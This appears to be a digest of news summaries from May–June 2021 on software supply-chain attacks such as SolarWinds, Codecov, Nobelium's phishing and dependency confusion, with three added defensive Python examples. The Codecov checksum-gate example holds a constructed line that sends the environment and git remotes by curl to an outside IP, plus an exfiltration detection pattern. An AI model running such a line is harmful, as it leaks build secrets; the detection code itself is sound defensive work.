(June 17, 2021)


Lessons learned from the SolarWinds cyberattack and the future of NY-DFS

The New York DFS alerted DFS-regulated entities of the SolarWinds attack on December 18, 2020, through its "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately, with 94% of impacted companies removing the vulnerable systems from their networks (and/or patching them) within three days of being notified of the attack. However, DFS noted gaps in the cybersecurity policies of several regulated entities, including irregularities in patching and patch management.

Ref - Mondaq 

_______________________________________________________________________________________

(June 17, 2021)


UNC2465 cybercrime group launched a supply chain attack on CCTV vendor

An affiliate of the DarkSide ransomware gang, tracked as UNC2465, has conducted a supply chain attack against a CCTV vendor by trojanizing the Dahua SmartPSS Windows app that the vendor distributed to its customers. UNC2465 is considered one of the main affiliates of the DARKSIDE group, along with other affiliated gangs tracked by FireEye/Mandiant as UNC2628 and UNC2659.


_______________________________________________________________________________________

(June 17, 2021)


The SolarWinds attack and its lessons

The increase in sophisticated and complex cyberattacks like SolarWinds requires a change in the traditional security paradigm, raising the priority of cybersecurity and of security policy. Two types of policies are discussed: prevention policies and problem-solving policies.


_______________________________________________________________________________________

(June 16, 2021)


Everything you need to know about SolarWinds hack

The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.

Ref - TechTarget 

_______________________________________________________________________________________

(June 16, 2021)


Smoking out a Darkside affiliate’s supply chain software compromise

Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. 

Ref - FireEye
 
_______________________________________________________________________________________

(June 16, 2021)


New ThroughTek IoT supply chain vulnerability announced

DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.


_______________________________________________________________________________________

(June 16, 2021)


Darkside operator involved in supply chain attack via CCTV vendor’s website

A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.

Ref - The Record 

_______________________________________________________________________________________

(June 16, 2021)


Supply chain attacks and vulnerability disclosures

SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year’s victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest attack on supply chains is on Edward Don and Company, a known distributor of foodservice equipment and supplies in the U.S.

Ref - ECCouncil 

_______________________________________________________________________________________

(June 16, 2021)


SolarWinds’ transparency trying to ensure others are safer

Sudhakar Ramakrishna, President and CEO of SolarWinds, shared his thoughts on the importance of continuously learning from everything, be it a bug or a cyber incident. These learnings fortify what can be done going forward to make it that much more difficult for a threat actor to carry out their attacks.

Ref - Carahsoft 

_______________________________________________________________________________________

(June 14, 2021)


How to ensure third parties don't compromise the organizational supply chain

Organizations can probably count many third-party vendors in their IT environment vital in storing, securing, and analyzing their data. Most times, however, companies only assess the security of these third-party products when they’re onboarded. There’s no continuous security analysis or assessment. They should demand a monthly security risk assessment report from all third-party vendors to glean details on all known issues in their product and infrastructure.


_______________________________________________________________________________________

(June 14, 2021)


Codecov to retire the Bash script responsible for supply chain attack wave

Codecov has introduced a new uploader that relies on NodeJS to replace and remove a Bash script responsible for a recent supply chain attack. The new uploader will be shipped as a static binary executable suitable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks taking place around January 31, 2021, made public on April 15.

Ref - ZDNet 
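The check a pipeline can apply to any vendor-fetched uploader before executing it, as an added example (this is not Codecov's code): pin the script's SHA-256 and refuse to run on a mismatch, and additionally scan for lines that push `$(env)` out over curl or wget, which is the pattern the tampered Bash uploader used to steal CI secrets. The script contents, the pinned hash, and the 198.51.100.7 host are constructed for this example.

```python
"""
Checksum-gate a downloaded CI uploader script before executing it.

The Codecov compromise worked because CI jobs fetched a Bash script from the
vendor and piped it straight into a shell. Pinning the expected SHA-256 in
the pipeline, and refusing to run on mismatch, turns silent tampering into a
loud build failure. A second, cheap check flags the tell-tale line shape of
that attack: the whole process environment sent in an outbound request.
"""
import hashlib
import hmac
import re
from typing import List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_uploader(script: bytes, expected_sha256: str) -> bool:
    """True only if the script hashes to the pinned value.

    compare_digest avoids a timing side channel; cheap, and the idiom
    should be habitual wherever secrets or digests are compared.
    """
    return hmac.compare_digest(sha256_hex(script), expected_sha256.lower())


# Heuristic, assumed for this example: an environment dump ($(env), $(printenv),
# or `env | curl ...`) on a line that makes an outbound request.
EXFIL_RE = re.compile(
    r"\$\((?:env|printenv)\)|\b(?:env|printenv)\b\s*\|.*\b(?:curl|wget)\b", re.I
)


def find_exfil_lines(script_text: str) -> List[Tuple[int, str]]:
    """Return (line_no, line) for each line that looks like environment exfiltration."""
    return [
        (n, line)
        for n, line in enumerate(script_text.splitlines(), 1)
        if EXFIL_RE.search(line)
    ]


def safe_to_run(script: bytes, expected_sha256: str) -> Tuple[bool, List[Tuple[int, str]]]:
    """Gate for the pipeline: (ok, findings). ok is False on hash mismatch or findings."""
    findings = find_exfil_lines(script.decode("utf-8", "replace"))
    ok = verify_uploader(script, expected_sha256) and not findings
    return ok, findings


# Constructed sample: a benign uploader, and the same script with an appended
# exfiltration line of the shape used in the Codecov incident (TEST-NET IP).
GOOD = (
    b"#!/bin/bash\n"
    b"set -e\n"
    b"curl -sS -X POST --data-binary @coverage.xml https://codecov.example/upload\n"
)
PINNED = sha256_hex(GOOD)  # in a real pipeline this literal is committed with the workflow
TAMPERED = GOOD + (
    b'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" '
    b"http://198.51.100.7/upload/v2 || true\n"
)


if __name__ == "__main__":
    for name, script in (("good", GOOD), ("tampered", TAMPERED)):
        ok, findings = safe_to_run(script, PINNED)
        print(f"{name}: {'RUN' if ok else 'REFUSE'}")
        for n, line in findings:
            print(f"  suspicious line {n}: {line}")
```

The hash pin is the real control; the regex only catches one known shape of tampering and should be treated as a tripwire, not a filter. A static binary with a published checksum, which is what Codecov moved to, makes the same pin straightforward to apply.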

_______________________________________________________________________________________

(June 13, 2021)


SolarWinds hack emboldened cyberattackers for ransomware attack spree

When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.

Ref - Yahoo 

_______________________________________________________________________________________

(June 11, 2021)


Monumental supply-chain attack on Airlines traced to APT41

A monster cyberattack on SITA, a global IT provider for 90 percent of the world’s airline industry, is slowly unfolding to reveal the largest supply-chain attack on the airline industry in history. After Air India revealed the details of its security breach, it became clear that the carriers were most likely dealing with one of the biggest supply-chain attacks in the airline industry’s history, potentially traced back to the Chinese state-sponsored threat actor APT41.

 
_______________________________________________________________________________________

(June 10, 2021)


Mitigating third-party risks with effective cyber risk management

When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties and that the third parties that hold and use that data, are effectively an extension of the customer’s business.


_______________________________________________________________________________________

(June 10, 2021)


What SolarWinds taught enterprises about data protection

The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted how devastating the outcome could have been had the SolarWinds hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.


_______________________________________________________________________________________

(June 9, 2021)


Hardening the physical security supply chain to mitigate the cyber-risk

A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.

 
_______________________________________________________________________________________

(June 9, 2021)


How to stop SolarWinds-like hacks

Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on using physically unclonable functions (PUFs) for authentication. At a microscopic level, even mass-produced computer chips differ slightly from one another, and a PUF turns those differences into a device fingerprint that cannot be copied. An online bank, for example, could check a device's PUF to make sure that only someone holding the right device is accessing an account. This could help defend against attacks that bypass two-factor authentication, a technique the SolarWinds attackers exploited.

Ref - Nautil.us 

_______________________________________________________________________________________

(June 9, 2021)


Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack

ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.


_______________________________________________________________________________________

(June 8, 2021)


Protecting Industrial Control Systems against cyberattacks

ICS operators face the challenge of confirming the security of the supply chain for the OT devices and sensors they rely on. Suppliers are under no obligation to comply with ISO/IEC 27001:2013, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted channel for software delivery.


_______________________________________________________________________________________

(June 8, 2021)


The next phase of software supply chain security

The recent executive order signed by President Joe Biden does several important things for software supply chain security. It requires NIST to develop baseline security standards for software used by government agencies. Those standards must cover secure software development environments, including practices such as using administratively separate build environments and auditing trust relationships.


_______________________________________________________________________________________

(June 8, 2021)


The rise and rise of supply chain attacks

There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.


 _______________________________________________________________________________________

(June 8, 2021)


Supply chain security awareness - Key risk factors

As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.


_______________________________________________________________________________________

(June 7, 2021)


Defending against Software supply chain attacks: Recommendations from NIST

Given the scarcity of rapid mitigation options in the event of a software supply chain attack (the victim organization has no authority to command a timely response from its software vendor), it is far more beneficial to invest in preventive measures. Experts recommend applying a risk management lens when purchasing software and asking prospective vendors for compliance verification.


_______________________________________________________________________________________

(June 6, 2021)


Why are supply chain attacks scary?

Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.

 
_______________________________________________________________________________________

(June 5, 2021)


CEO of Mandiant talks about SolarWinds hack

Kevin Mandia, CEO of Mandiant, pointed out in an interview at WSJ Cybersecurity that the U.S. government is still working out what is and is not considered cyberwar and grounds for retaliation. He commented that “apparently supply chain attacks are fair game.”

Ref - Medium 

_______________________________________________________________________________________

(June 4, 2021)


Strengthening US cybersecurity: Impacts of the Executive Order

Even though the specifics of the executive order are not yet available, compliance officers can start to anticipate the changes their business will need to make. First, they can expect to perform a fresh assessment of compliance risks under the new cybersecurity requirements. Second, they need to consider the new policies and procedures their business might need to implement.

Ref - JD Supra 

_______________________________________________________________________________________

(June 4, 2021)


As cyberattacks surge, Biden seeks to mount a better defense

As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.

Ref - NPR

 _______________________________________________________________________________________

(June 3, 2021)


Dependency confusion: Compromising the supply chain

Researchers demonstrated that if an attacker registers an organization's private package names on a public package repository and uploads packages of the same name containing malicious code, the package manager can pull the attacker's public version into internal applications, resulting in data exfiltration or remote code execution. The researcher details how he successfully exploited this vector to get his code running inside Apple, Shopify, Microsoft, and PayPal, among others, and secured large bug bounties.


_______________________________________________________________________________________

(June 3, 2021)


Organizations are still wondering about Dependency Confusion attacks

In early February 2021, the dependency confusion technique was disclosed, together with proof that it had been used to reach into major technology companies, including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of copycat packages appearing on the npm registry. Routing rules for internal repositories can address some of the problem, but they require manual adjustment and quickly go out of date, so automation is necessary to keep on top of it.

Ref - Sonatype 
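The two dependency confusion entries above (June 3) describe the same resolver weakness: an unscoped internal package name that also exists on the public registry can be satisfied from either source, and a resolver that simply takes the highest version takes the attacker's. The audit below is an added example, not code from the cited research or from Sonatype. It models that resolution over a constructed package.json, .npmrc, private-registry listing and public-registry snapshot (the @acme and @acme-labs scopes, the npm.internal.example registry URL, and every package name and version are hypothetical) and classifies each internal dependency by its exposure.

```python
"""Added example: audit a package.json for dependency-confusion exposure.

Models how a resolver that merges a private and a public registry picks the
highest version, then classifies each internal dependency accordingly.
All registry URLs, package names and versions below are constructed.
"""
import json
import re
from typing import Dict, List, Optional, Tuple

# Hypothetical private registry; scope mappings in .npmrc must point here.
PRIVATE_REGISTRY = "https://npm.internal.example/"

# Constructed package.json of an internal service.
PACKAGE_JSON = json.dumps({
    "name": "billing-service",
    "dependencies": {
        "@acme/auth-client": "^1.4.0",    # scoped and routed by .npmrc
        "@acme-labs/metrics": "^2.0.0",   # scoped, but the scope is not mapped
        "acme-payments-core": "^3.1.0",   # unscoped, and a squatter holds it publicly
        "acme-ledger-utils": "^0.9.0",    # unscoped, still unclaimed publicly
        "lodash": "^4.17.21",             # genuinely public
    },
})

# Constructed .npmrc: only the @acme scope is pinned to the private registry.
NPMRC = """
registry=https://registry.npmjs.org/
@acme:registry=https://npm.internal.example/
//npm.internal.example/:_authToken=${NPM_TOKEN}
"""

# What the private registry serves (constructed).
PRIVATE_INDEX: Dict[str, List[str]] = {
    "@acme/auth-client": ["1.4.0", "1.4.1"],
    "@acme-labs/metrics": ["2.0.0"],
    "acme-payments-core": ["3.1.0", "3.1.2"],
    "acme-ledger-utils": ["0.9.0"],
}

# Snapshot of the public registry (constructed). A squatter has published a
# package under the internal name with an absurdly high version number.
PUBLIC_INDEX: Dict[str, List[str]] = {
    "lodash": ["4.17.20", "4.17.21"],
    "acme-payments-core": ["99.0.0"],
}


def parse_npmrc(text: str) -> Dict[str, str]:
    """Return {scope: registry_url} for every '@scope:registry=...' line."""
    scopes: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"^(@[\w.-]+):registry=(\S+)$", line.strip())
        if m:
            scopes[m.group(1)] = m.group(2)
    return scopes


def semver_key(version: str) -> Tuple[int, ...]:
    """Sort key for plain x.y.z versions (prerelease tags are out of scope here)."""
    return tuple(int(part) for part in version.split("."))


def naive_resolve(name: str, private_index: Dict[str, List[str]],
                  public_index: Dict[str, List[str]]) -> Optional[Tuple[str, str]]:
    """Model a resolver that merges both registries and takes the highest version.

    Returns (version, source) or None. This is the behaviour dependency
    confusion abuses: the source is never considered, only the version number.
    """
    candidates = [(v, "private") for v in private_index.get(name, [])]
    candidates += [(v, "public") for v in public_index.get(name, [])]
    if not candidates:
        return None
    return max(candidates, key=lambda c: semver_key(c[0]))


def classify(name: str, scopes: Dict[str, str],
             private_index: Dict[str, List[str]],
             public_index: Dict[str, List[str]]) -> str:
    """Classify one dependency by its dependency-confusion exposure."""
    if name not in private_index:
        return "PUBLIC"                 # not ours; outside this check
    if name.startswith("@"):
        scope = name.split("/", 1)[0]
        if scopes.get(scope) == PRIVATE_REGISTRY:
            return "OK"                 # scope pinned: the public registry is never consulted
        return "SCOPE_UNPINNED"         # falls through to the default registry
    if name in public_index:
        return "CONFUSION_RISK"         # a public copy exists; naive_resolve() shows which wins
    return "HIJACKABLE"                 # name still free publicly; a squatter can claim it


def audit(package_json: str, npmrc: str,
          private_index: Dict[str, List[str]],
          public_index: Dict[str, List[str]]) -> Dict[str, str]:
    """Return {dependency: finding} for every entry in package.json."""
    deps = json.loads(package_json).get("dependencies", {})
    scopes = parse_npmrc(npmrc)
    return {name: classify(name, scopes, private_index, public_index) for name in deps}


if __name__ == "__main__":
    for dep, finding in audit(PACKAGE_JSON, NPMRC, PRIVATE_INDEX, PUBLIC_INDEX).items():
        winner = naive_resolve(dep, PRIVATE_INDEX, PUBLIC_INDEX)
        print(f"{finding:16} {dep:24} naive pick: {winner}")
```

SCOPE_UNPINNED means the scope is not mapped to the private registry, so the default registry is consulted for it; HIJACKABLE means nobody has claimed the name publicly yet, which is exactly the window a squatter uses; CONFUSION_RISK means the name is already taken and a naive resolver will prefer the higher public version. In a real audit the two constructed indexes are replaced by queries against the private registry and the public one; the classification logic stays the same.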

_______________________________________________________________________________________

(June 3, 2021)


Challenges with protecting the Supply Chain

With regard to protecting the supply chain, businesses should first take steps to identify their key assets, identify their partners, and determine what access those partners have to the key assets. Industry frameworks such as NIST, OWASP, and the CIS Controls all require an understanding of where critical assets are, be they hardware, software, endpoints, or applications. However, compiling these inventories is a struggle for most.

Ref - Toolbox 

_______________________________________________________________________________________

(June 3, 2021)


Japanese government agencies suffered supply chain attack exposing proprietary data

Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu's “ProjectWEB” information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyberattack affected the Ministry of Land, Infrastructure, Transport and Tourism, the Cabinet Secretariat, and Narita International Airport.

Ref - CPO Magazine 

_______________________________________________________________________________________

(June 2, 2021)


Proactive security key to combating supply chain attacks

Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.


_______________________________________________________________________________________

(June 1, 2021)


NobleBaron poisoned installers could be used in supply chain attacks

The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.

Ref - SentinelOne 

_______________________________________________________________________________________

(June 1, 2021)


SolarWinds attack was an attack on trust

The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.

Ref - IT Web 

_______________________________________________________________________________________

(June 1, 2021)


The U.S. seizes domains used by SolarWinds hackers

The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding that the action was aimed at disrupting the threat actors' follow-on exploitation of victims as well as blocking their ability to compromise new systems.


_______________________________________________________________________________________

(June 1, 2021)


Defining linchpins: An industry perspective on remediating Sunburst

The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software. 

Ref - CSO Online 

_______________________________________________________________________________________

(May 31, 2021)


CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service

According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.


_______________________________________________________________________________________

(May 31, 2021)


Why are supply chain attacks so dangerous?

By compromising a single supplier, spies or saboteurs can hijack its distribution systems to turn any application they sell, any software update they push out, even the physical equipment they ship to customers, into Trojan horses. With one well-placed intrusion, they can create a springboard to the networks of a supplier's customers—sometimes numbering hundreds or even thousands of victims.

Ref - Wired

 _______________________________________________________________________________________

(May 31, 2021)


SolarWinds and Colonial Pipeline crisis showed 7 ways to respond to cyberattacks

The federal government and other agencies have demonstrated several crisis management best practices in response to the recent cyberattacks against SolarWinds and Colonial Pipeline. Business leaders should keep these best practices in mind when they have to deal with cyberattacks—and other crisis situations—at their companies and organizations.

Ref - Forbes

_______________________________________________________________________________________

(May 30, 2021)


Defending and deterring the Nobelium attacks

Microsoft provided several recommendations for protection against attacks like SolarWinds. The first step is to opt for better defense. The best defense, according to Microsoft, is to move to the cloud, where the most secure technology from any cloud provider is always up to date, and where the fastest security innovations are occurring. The second step is to deter damaging attacks. Clearer rules for nation-state conduct need to be defined and agreed to by the international community.

Ref - Microsoft 

_______________________________________________________________________________________

(May 29, 2021)


Biden budget sets aside $750 million for SolarWinds response

U.S. President Joe Biden's proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack. The money comes on top of a $500 million fund for federal cybersecurity as the U.S. government recovers from the cyberattack that hit nine agencies including the State Department and Treasury.

Ref - Yahoo
 
_______________________________________________________________________________________

(May 28, 2021)


Breaking down Nobelium’s latest early-stage toolset

Each of the NOBELIUM tools is designed for flexibility, enabling the actor to adapt to operational challenges over time. Microsoft Threat Intelligence Center (MSTIC) has released an appendix of indicators of compromise (IOCs) for the community to better investigate and understand NOBELIUM’s most recent operations.

Ref - Microsoft 

_______________________________________________________________________________________

(May 28, 2021)


Sophisticated spear-phishing campaign targets Government organizations, IGOs, and NGOs

CISA and FBI acknowledge open-source reporting attributing the activity discussed in the report to APT29 (also known as Nobelium, The Dukes, and Cozy Bear). However, CISA and FBI are investigating this activity and have not attributed it to any threat actor at this time. CISA and FBI urge governmental and international affairs organizations and individuals to adopt a heightened state of awareness and implement the recommendations specified in its advisory.

Ref - CISA 

_______________________________________________________________________________________

(May 28, 2021)


The key lesson from the SolarWinds hack is visibility

The SolarWinds attack has laid bare the interconnectedness of IT infrastructure: if most of the government and business infrastructure uses overlapping software packages, they are clearly not as separate from one another as they would like to think. Vulnerabilities could be anywhere throughout the supply chain. Why would hackers attack a single end-user when they can backdoor their way into all of them at once via a single service platform?

Ref - CIO 

_______________________________________________________________________________________

(May 28, 2021)


How Nobelium leveraged Constant Contact in the Phishing campaign

The May 25 phishing campaign included several iterations of emails sent from the Constant Contact account of USAID. In one example, the emails appear to originate from USAID and pose as an “alert” from USAID dated May 25, 2021. If the user clicked the link in the email, the URL took them to the legitimate Constant Contact service, which then redirected to Nobelium-controlled infrastructure, where a malicious ISO file was delivered to the system.

Ref - CRN

 _______________________________________________________________________________________

(May 28, 2021)


Almost 3,000 emails targeted by Nobelium attack

The threat actor behind last year's major SolarWinds hack has run a new targeted campaign reaching nearly 3,000 email accounts. According to reports, the hackers accessed the Constant Contact account of USAID, the service it uses for email marketing. From there, Nobelium distributed phishing emails whose links led to a malicious file that delivered a backdoor called NativeZone.

Ref - ARNNet 
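The chain described in the two entries above (a click on a legitimate bulk-mail tracking link, a redirect to attacker infrastructure, then an ISO download) shows up in web proxy logs as a few requests from one client within seconds of each other. The detector below is an added example and is not Microsoft's, CRN's or anyone else's published detection logic. It runs over constructed proxy log lines in a made-up seven-field format (timestamp, client, method, URL, status, response content type, Location header or '-'), treats links.mailer.example as a stand-in for the mail service's click-tracking host, and flags any client whose click on such a link ends, through one or more redirects, at an ISO. Every hostname, path and file name in the sample is invented.

```python
"""Added example: flag mailer-click -> redirect -> ISO download chains in proxy logs.

The log format is invented for this example: seven space-separated fields
(timestamp, client, method, URL, status, response content type, Location
header or '-'). Hostnames and file names in the sample are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import urlparse

# Click-tracking hosts of bulk-mail services; a placeholder stands in for the real one.
MAILER_HOSTS = {"links.mailer.example"}
WINDOW = timedelta(seconds=30)   # the whole chain must complete within this span

# Constructed sample: client 10.0.0.7 follows a mailer link through two redirects
# to an ISO; client 10.0.0.9 follows a mailer link to an ordinary newsletter;
# 10.0.0.7 later downloads an ISO directly, with no mailer click behind it.
SAMPLE_LOG = """
2021-05-25T14:02:01 10.0.0.7 GET https://links.mailer.example/tn.jsp?f=a1b2 302 text/html https://usaid-alert.example-cdn.net/view
2021-05-25T14:02:02 10.0.0.7 GET https://usaid-alert.example-cdn.net/view 302 text/html https://usaid-alert.example-cdn.net/usaid-alert.iso
2021-05-25T14:02:03 10.0.0.7 GET https://usaid-alert.example-cdn.net/usaid-alert.iso 200 application/octet-stream -
2021-05-25T14:05:00 10.0.0.9 GET https://links.mailer.example/tn.jsp?f=c3d4 302 text/html https://newsletter.example.org/issue-42
2021-05-25T14:05:01 10.0.0.9 GET https://newsletter.example.org/issue-42 200 text/html -
2021-05-25T14:30:00 10.0.0.7 GET https://mirror.example.net/ubuntu-20.04.iso 200 application/x-iso9660-image -
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<ctype>\S+) (?P<location>\S+)$"
)


class Hit(NamedTuple):
    ts: datetime
    client: str
    url: str
    status: int
    ctype: str
    location: str


@dataclass
class Chain:
    origin: Hit   # the click on the mailer link
    expect: str   # URL the client should request next if it follows the redirect
    hops: int     # redirects seen so far


def parse_line(line: str) -> Optional[Hit]:
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return Hit(datetime.fromisoformat(m["ts"]), m["client"], m["url"],
               int(m["status"]), m["ctype"], m["location"])


def is_redirect(hit: Hit) -> bool:
    return 300 <= hit.status < 400 and hit.location != "-"


def looks_like_iso(hit: Hit) -> bool:
    """ISO by extension or declared content type (octet-stream alone is not enough)."""
    path = urlparse(hit.url).path.lower()
    return path.endswith(".iso") or hit.ctype == "application/x-iso9660-image"


def detect(lines: List[str]) -> List[dict]:
    """Return one alert per mailer click that ends at an ISO via redirects."""
    pending: Dict[str, List[Chain]] = defaultdict(list)   # client -> open chains
    alerts: List[dict] = []
    for line in lines:
        hit = parse_line(line)
        if hit is None:
            continue
        host = (urlparse(hit.url).hostname or "").lower()
        if host in MAILER_HOSTS and is_redirect(hit):
            pending[hit.client].append(Chain(hit, hit.location, 1))   # chain opens here
            continue
        for chain in list(pending[hit.client]):
            if hit.url != chain.expect or hit.ts - chain.origin.ts > WINDOW:
                continue
            pending[hit.client].remove(chain)
            if looks_like_iso(hit):
                alerts.append({"client": hit.client, "lure": chain.origin.url,
                               "payload": hit.url, "hops": chain.hops + 1})
            elif is_redirect(hit):   # another hop; keep chasing from the same origin
                pending[hit.client].append(Chain(chain.origin, hit.location, chain.hops + 1))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The rule keys on the sequence rather than on any single indicator, which is what keeps it useful after the attacker's hostnames change: the direct Ubuntu ISO download in the sample is not flagged because no mailer click precedes it, and the newsletter click is not flagged because it never reaches an ISO. Tightening WINDOW or adding a domain allowlist for the final hop are the obvious tuning knobs once it runs on real proxy data.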

_______________________________________________________________________________________

(May 28, 2021)


The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft

The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.

Ref - Reuters 

_______________________________________________________________________________________

(May 28, 2021)


Russia appears to carry out a hack through the system used by the U.S. Aid Agency

By breaching the systems of a supplier used by the federal government, the hackers sent out genuine-looking emails, as recently as this week, to more than 3,000 email accounts. The emails delivered code that would give the hackers broad access to the recipients' computer systems, from stealing data to infecting other computers on the network.


 _______________________________________________________________________________________

(May 27, 2021)


Another Nobelium Cyberattack

Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.

Ref - Microsoft 

_______________________________________________________________________________________

(May 27, 2021)


Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack

While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.

Ref - SC Magazine 

_______________________________________________________________________________________

(May 27, 2021)


Canada Post falls victim to a third-party hack

Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.


_______________________________________________________________________________________

(May 26, 2021)


The EU’s response to SolarWinds

Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.

Ref - CFR 

_______________________________________________________________________________________

(May 26, 2021)


Newly discovered bugs in VSCode extensions could lead to supply chain attacks

